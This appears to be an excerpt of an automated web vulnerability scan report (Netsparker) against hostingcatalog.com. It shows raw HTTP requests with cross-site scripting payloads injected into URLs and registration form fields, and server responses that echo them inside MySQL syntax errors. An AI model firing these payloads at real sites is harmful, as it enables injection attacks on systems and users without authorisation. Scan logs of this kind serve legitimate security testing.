HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 345 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00072B)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/faq.txt'"--></style></script><script>netsparker(0x00072B)</script>'
- /file.php/contact.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00073E)%3C/script%3E
Parameters
Parameter
Type
Value
URI-BASED
Raw URI
'"--></style></script><script>alert(0x00073E)</script>
Request
GET /file.php/contact.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00073E)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ih5c11ng15cq97vpjgk3ki9jf5; time_0=1303647875; user_counted_0=%3CAND%3E101%3CAND%3E43%3CAND%3E46 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00073E)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/contact.txt'"--></style></script><script>netsparker(0x00073E)</script>'
- /file.php/partner1.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000753)%3C/script%3E
Parameters
Parameter
Type
Value
URI-BASED
Raw URI
'"--></style></script><script>alert(0x000753)</script>
Request
GET /file.php/partner1.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000753)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ih5c11ng15cq97vpjgk3ki9jf5; time_0=1303647875; user_counted_0=%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 350 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x000753)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/partner1.txt'"--></style></script><script>netsparker(0x000753)</script>'
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
"><iMg src=N onerror=alert(9)>
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 545 Accept-Encoding: gzip, deflate account_type=1&address=%22%3e%3ciMg+src%3dN+onerror%3dnetsparker(9)%3e&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:48:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD5B1A1545CAF0FE79DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD5AC5BE9D169404B7F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD57B4CA7971A19D51CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5591D31FA6F09E5FEC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD51A0783C3A9C036596F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5DBD330A85647FBEEC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD5D9C3F5835BD2C975C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD5F5CC682AE3D7CB0F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD5D985BBF8D7F18396C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD589C598F7953268606F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD5CA7CE84E37C72B5FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD5A41B6AF4024EED6FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD518F91CC68B3C4EFBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD58A05B05A969F25D0C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD5BDE13D178D65FB2EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD5CE2863657ACD7F0AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD5A7599A3592C60F586F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD54F247171E97E98786F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD5F284AB60CD0E403A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
'"--></style></script><script>alert(0x001C7A)</script>
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C7A)%3c%2fscript%3e&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:48:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD55474AFED60321933C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD52CE3C48C8924FBEE6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD50776FB573D481901C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD57E65D605C326A652C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD5CECA730BA658F7D56F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5FA89DC2928CBA9C0C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD505DC966F9AC271F3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD5857A5DCCE64F883E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD5FA75E51E60CF1ACDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD58732319DDFD2B4B86F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option 